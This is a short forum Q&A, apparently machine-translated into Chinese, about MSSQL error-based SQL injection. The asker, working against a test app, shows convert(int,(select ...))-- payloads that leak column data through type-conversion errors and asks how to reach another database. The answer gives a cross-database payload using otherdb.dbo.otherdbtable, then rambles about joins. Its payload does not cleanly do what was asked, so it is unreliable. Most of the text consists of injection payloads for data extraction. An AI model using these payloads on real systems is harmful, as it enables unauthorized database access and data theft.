MSSQL注入從另一個數據庫中提取列數據

Question

我設置了一個易受mssql注入攻擊的測試臺應用程序，我想知道如何從另一個數據庫中提取列數據？從當前數據庫中提取列數據，我們做的事：

convert(int,(select columnnamegoeshere from tablenamegoeshere))-- 

，然後枚舉其他列的數據，我們做的事：

convert(int,(select columnnamegoeshere from tablenamegoeshere where columnnamegoeshere not in ('firstentryfromcolumn')))-- 

但是，如果它不是默認的數據庫內，我們要提取列數據從另一個數據庫中，我們該怎麼做？謝謝。

Answer 1

我會做一個連接...但是，爲了保持簡單的你，這裏是一個使用不同的數據庫列代碼：

convert(int,(select columnnamegoeshere from tablenamegoeshere where columnnamegoeshere not in (select top 1 firstentryfromcolumn from otherdb.dbo.otherdbtable))) 

倒不如加入2代表一起，並排除記錄是否可能......子查詢通常較慢，並不是最好的方式去做。